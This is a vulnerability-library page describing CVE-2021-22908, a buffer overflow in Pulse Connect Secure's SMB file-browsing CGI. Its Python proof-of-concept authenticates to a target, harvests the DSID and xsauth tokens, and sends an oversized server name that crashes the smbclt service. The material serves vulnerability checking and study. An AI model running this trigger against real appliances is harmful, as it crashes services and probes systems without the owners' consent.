CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ru

# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ru

== Описание уязвимости ==

Поскольку PCS поддерживает соединение с общим доступом к файлам Windows (SMB), эта функция обеспечивается сценариями CGI, основанными на библиотеках Samba 4.5.10 и вспомогательных приложениях. При указании длинного имени сервера для определенных операций SMB приложение smbclt может аварийно завершить работу из-за переполнения буфера, в зависимости от длины указанного имени сервера.

Было подтверждено, что система PCS 9.1R11.4 имеет эту уязвимость. Целевая конечная точка CGI – /dana/fb/smb/wnf.cgi. Другие конечные точки CGI также могут вызывать эту уязвимость.

Если злоумышленнику не удается выполнить очистку после успешного использования этой уязвимости, указание длинного имени сервера может привести к появлению следующих записей журнала событий PCS:

Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.

Но для использования этой уязвимости на сервере PCS должна быть политика доступа к файлам Windows, разрешающая \\ *, или другая политика, позволяющая злоумышленнику подключаться к любому серверу. Вы можете просмотреть текущую политику SMB, просмотрев Пользователь-> Политика ресурсов-> Политика доступа к файлам Windows на странице управления PCS. Устройства PCS версии 9.1R2 и более ранних используют политику по умолчанию, разрешающую подключения к любому узлу SMB. Начиная с 9.1R3, эта политика была изменена с разрешения по умолчанию на отклонение по умолчанию.

== Сфера влияния ==
Pulse Connect Secure 9.0RX and 9.1RX

==POC==

#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'name'):
                    if(attr[1] == self.searchval):
                        foundelement = True
                elif(attr[0] == 'value' and foundelement == True):
                     self.data = attr[1]

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'id'):
                    if(attr[1] == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers['location']:
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers['location']:
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers['location']:
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers['location']:
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)
</pre>
<p>== Ссылка ==<br />
https://short.pwnwiki.org/?c=1NiPen</p>
<p>https://short.pwnwiki.org/?c=2Um6Rb</p>
                    </div>
        <div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有，未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>漏洞库</a><br></div>    </div>
    <div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2902"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><a href="javascript:;" data-toggle="modal" data-target="#rewards-modal-1" data-remote="https://vip.bdziyi.com/wp-admin/admin-ajax.php?id=1&action=user_rewards_modal" class="rewards action action-rewards"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-money"></use></svg><text>赞赏</text></a><span class="hover-show dropup action action-share">
        <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone"  target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/2902/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ru-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&summary=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ru == Описание уязвимости == Поскольку PCS поддерживает соединение с общим доступом к файлам Windows (SMB), эта функция обеспечивается сценариями CGI, основ..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo"  target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/2902/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ru-棉花糖会员站&pic=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq"  target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/2902/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_ru-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&desc=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/ru == Описание уязвимости == Поскольку PCS поддерживает соединение с общим доступом к файлам Windows (SMB), эта функция обеспечивается сценариями CGI, основ..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2902" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/2902/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2902"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author">
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共7篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>7</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共959条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>959</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共352个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>352</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 169W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>169W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册（1.8.8版本 25.12.12更新）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="px12 opacity8 mt6"><item>2025年12月1日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3.7W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/57589/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/biji/202506011606395.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="px12 opacity8 mt6"><item>2025年7月3日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.5W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2025/03/20250310133450331.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线！免费会员等你来嫖！-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="px12 opacity8 mt6"><item>2024年12月17日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 8563</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6285</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>2024年3月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4557</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版（49个学生分享视频版本）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版（49个学生分享视频版本）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版（49个学生分享视频版本）</div><div class="px12 opacity8 mt6"><item>2024年6月8日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3731</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div>
        </div>
    </div>    <div class="theme-box" style="height:99px">
        <nav class="article-nav">
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://vip.bdziyi.com/2562/">
                    <p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i
                            class="fa fa-angle-left em12 mr6"></i>上一篇</p>
                    <div class="text-ellipsis-2">
                        Apache_Superset_1.1.0_基於時間的用戶枚舉漏洞                    </div>
                </a>
            </div>
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://vip.bdziyi.com/2914/">
                    <p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i
                            class="fa fa-angle-right em12"></i></p>
                    <div class="text-ellipsis-2">
                        Main_Page                    </div>
                </a>
            </div>
        </nav>
    </div>
<div class="theme-box relates relates-thumb">
            <div class="box-body notop">
                <div class="title-theme">相关推荐</div>
            </div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6285</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58091/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶EAS autoLogin.jsp远程代码执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶EAS autoLogin.jsp远程代码执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2423</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58988/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="百度网盘Windows客户端存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">百度网盘Windows客户端存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">百度网盘Windows客户端存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年9月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2294</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58241/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="大华 evo-runs/v1.0/receive RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">大华 evo-runs/v1.0/receive RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">大华 evo-runs/v1.0/receive RCE</div><div class="px12 opacity8 mt6"><item>2025年7月11日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1984</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58301/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="wps 远程代码执行 rce-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">wps 远程代码执行 rce</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">wps 远程代码执行 rce</div><div class="px12 opacity8 mt6"><item>2025年7月18日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1819</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58089/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行</div><div class="px12 opacity8 mt6"><item>2025年7月4日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1701</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments">
	<div class="box-body notop">
		<div class="title-theme">评论			<small>抢沙发</small></div>
	</div>

	<div class="no_webshot main-bg theme-box box-body radius8 main-shadow">
									<div class="comment-signarea text-center box-body radius8">
					<h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3>
					<p>
						<a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a>
						<a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a>					</p>
					<p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2902%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div>				</div>
									<div id="postcomments">
			<ol class="commentlist list-unstyled">
				<div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div>			</ol>
		</div>
			</div>
</div>        </div>
    </div>
    <div class="sidebar">
	<div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img  class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div>
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
